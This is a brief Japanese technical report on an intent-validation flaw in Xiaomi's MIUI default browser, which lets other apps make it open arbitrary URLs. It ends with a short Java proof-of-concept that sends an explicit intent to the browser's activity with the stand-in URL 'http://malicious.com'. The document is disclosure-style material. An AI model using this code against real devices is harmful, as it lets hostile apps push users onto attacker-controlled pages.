
Xiaomiの重大な脆弱性に関する技術レポート
Xiaomiの重大な脆弱性に関する技術レポート
脆弱性の概要
Xiaomiのデフォルトブラウザ(com.android.browser)において、複数のMIUIデバイスで脆弱性が発見されました。このアプリはstartActivityを介して渡されるインテントを適切に検証しないため、悪意のあるアプリが任意のURLを開いたり、意図しないアクションを実行したりすることが可能です。
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);